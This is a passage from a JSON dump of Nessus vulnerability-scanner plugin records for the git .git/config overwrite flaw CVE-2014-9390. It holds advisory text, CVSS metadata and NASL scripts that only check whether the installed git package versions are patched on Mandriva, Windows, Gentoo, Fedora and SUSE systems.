audit(AUDIT_INST_PATH_NOT_VULN, appname+'(-Beta)');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-01T03:45:36", "description": "Updated git packages fix security vulnerability :\n\nIt was reported that git, when used as a client on a case-insensitive\nfilesystem, could allow the overwrite of the .git/config file when the\nclient performed a git pull. Because git permitted committing\n.Git/config (or any case variation), on the pull this would replace\nthe user's .git/config. If this malicious config file contained\ndefined external commands (such as for invoking and editor or an\nexternal diff utility) it could allow for the execution of arbitrary\ncode with the privileges of the user running the git client\n(CVE-2014-9390).", "edition": 23, "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : git (MDVSA-2015:169)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:gitview", "p-cpe:/a:mandriva:linux:git-core", "p-cpe:/a:mandriva:linux:git-core-oldies", "p-cpe:/a:mandriva:linux:git-arch", "cpe:/o:mandriva:business_server:2", "p-cpe:/a:mandriva:linux:git", "p-cpe:/a:mandriva:linux:perl-Git", "p-cpe:/a:mandriva:linux:gitk", "p-cpe:/a:mandriva:linux:git-email", "p-cpe:/a:mandriva:linux:git-svn", "p-cpe:/a:mandriva:linux:lib64git-devel", "p-cpe:/a:mandriva:linux:gitweb", "p-cpe:/a:mandriva:linux:git-cvs", "p-cpe:/a:mandriva:linux:git-prompt"], "id": "MANDRIVA_MDVSA-2015-169.NASL", "href": "https://www.tenable.com/plugins/nessus/82422", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:169. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82422);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/08/02 13:32:57\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_xref(name:\"MDVSA\", value:\"2015:169\");\n\n script_name(english:\"Mandriva Linux Security Advisory : git (MDVSA-2015:169)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated git packages fix security vulnerability :\n\nIt was reported that git, when used as a client on a case-insensitive\nfilesystem, could allow the overwrite of the .git/config file when the\nclient performed a git pull. Because git permitted committing\n.Git/config (or any case variation), on the pull this would replace\nthe user's .git/config. If this malicious config file contained\ndefined external commands (such as for invoking and editor or an\nexternal diff utility) it could allow for the execution of arbitrary\ncode with the privileges of the user running the git client\n(CVE-2014-9390).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0546.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-core-oldies\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-prompt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gitview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64git-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-arch-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-core-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-core-oldies-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-cvs-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-email-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-prompt-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-svn-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"gitk-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"gitview-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"gitweb-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64git-devel-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"perl-Git-1.8.5.6-1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:03:30", "description": "The version of GitHub for Windows installed on the remote host is\nprior to 2.6.5. It is, therefore, affected by a command execution\nvulnerability when processing specially crafted git trees in a\ncase-insensitive or case-normalizing file system. A remote attacker,\nusing a specially crafted git tree, can overwrite a user's\n'.git/config' file when the user clones or checks out a repository,\nallowing arbitrary command execution.", "edition": 16, "published": "2014-12-22T00:00:00", "title": "GitHub for Windows < 2.6.5 .git/config Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:github:github", "cpe:/a:git:git"], "id": "GITHUB_WIN_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/80202", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80202);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_bugtraq_id(71732);\n\n script_name(english:\"GitHub for Windows < 2.6.5 .git/config Command Execution\");\n script_summary(english:\"Checks the version of GitHub.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application installed that is affected\nby a command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of GitHub for Windows installed on the remote host is\nprior to 2.6.5. It is, therefore, affected by a command execution\nvulnerability when processing specially crafted git trees in a\ncase-insensitive or case-normalizing file system. A remote attacker,\nusing a specially crafted git tree, can overwrite a user's\n'.git/config' file when the user clones or checks out a repository,\nallowing arbitrary command execution.\");\n # https://github.com/blog/1938-vulnerability-announced-update-your-git-clients\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ad68bb83\");\n script_set_attribute(attribute:\"see_also\", value:\"https://desktop.github.com/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://article.gmane.org/gmane.linux.kernel/1853266\");\n # http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?afc47628\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to GitHub for Windows 2.6.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:github:github\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:git:git\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"github_win_installed.nbin\");\n script_require_keys(\"installed_sw/GitHub for Windows\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"GitHub for Windows\";\n\ninstall = get_single_install(app_name:appname);\n\nversion = install['version'];\npath = install['path'];\n\nif (ver_compare(ver:version, fix:'2.6.5', strict:FALSE) < 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 2.6.5.0\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T11:04:45", "description": "The remote host is affected by the vulnerability described in GLSA-201509-06\n(Git: Arbitrary command execution)\n\n A vulnerability in Git causing Git-compatible clients that access\n case-insensitive or case-normalizing filesystems to overwrite the\n .git/config when cloning or checking out a repository, leading to\n execution of arbitrary commands.\n \nImpact :\n\n An attacker can execute arbitrary commands on a client machine that\n clones a crafted malicious Git tree.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 12, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-25T00:00:00", "title": "GLSA-201509-06 : Git: Arbitrary command execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2015-09-25T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:git", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201509-06.NASL", "href": "https://www.tenable.com/plugins/nessus/86137", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201509-06.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86137);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_xref(name:\"GLSA\", value:\"201509-06\");\n\n script_name(english:\"GLSA-201509-06 : Git: Arbitrary command execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201509-06\n(Git: Arbitrary command execution)\n\n A vulnerability in Git causing Git-compatible clients that access\n case-insensitive or case-normalizing filesystems to overwrite the\n .git/config when cloning or checking out a repository, leading to\n execution of arbitrary commands.\n \nImpact :\n\n An attacker can execute arbitrary commands on a client machine that\n clones a crafted malicious Git tree.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201509-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Git 1.8.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-vcs/git-1.8.5.6'\n All Git 1.9.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-vcs/git-1.9.5'\n All Git 2.0.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-vcs/git-2.0.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-vcs/git\", unaffected:make_list(\"rge 1.8.5.6\", \"rge 1.9.5\", \"ge 2.0.5\"), vulnerable:make_list(\"lt 2.0.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Git\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:26", "description": "Fixes for CVE-2014-9390\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "published": "2014-12-30T00:00:00", "title": "Fedora 21 : eclipse-egit-3.5.3-1.fc21 / eclipse-jgit-3.5.3-1.fc21 (2014-17341)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2014-12-30T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:eclipse-egit", "cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:eclipse-jgit"], "id": "FEDORA_2014-17341.NASL", "href": "https://www.tenable.com/plugins/nessus/80298", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17341.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80298);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(71732);\n script_xref(name:\"FEDORA\", value:\"2014-17341\");\n\n script_name(english:\"Fedora 21 : eclipse-egit-3.5.3-1.fc21 / eclipse-jgit-3.5.3-1.fc21 (2014-17341)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixes for CVE-2014-9390\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147192.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d40e2840\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147193.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b671553c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected eclipse-egit and / or eclipse-jgit packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:eclipse-egit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:eclipse-jgit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"eclipse-egit-3.5.3-1.fc21\")) flag++;\nif (rpm_check(release:\"FC21\", reference:\"eclipse-jgit-3.5.3-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"eclipse-egit / eclipse-jgit\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-07T14:22:20", "description": "This update fixes the following security issue :\n\n - CVE-2014-9390: arbitrary command execution vulnerability\n on case- insensitive file system (bnc#910756)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-05-20T00:00:00", "title": "SUSE SLES12 Security Update : git (SUSE-SU-2015:0100-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2015-05-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git-core-debuginfo", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:git-debugsource", "p-cpe:/a:novell:suse_linux:git-core"], "id": "SUSE_SU-2015-0100-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83671", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0100-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83671);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_bugtraq_id(71732);\n\n script_name(english:\"SUSE SLES12 Security Update : git (SUSE-SU-2015:0100-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issue :\n\n - CVE-2014-9390: arbitrary command execution vulnerability\n on case- insensitive file system (bnc#910756)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910756\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9390/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150100-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9da29764\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-37\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2015-37\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif 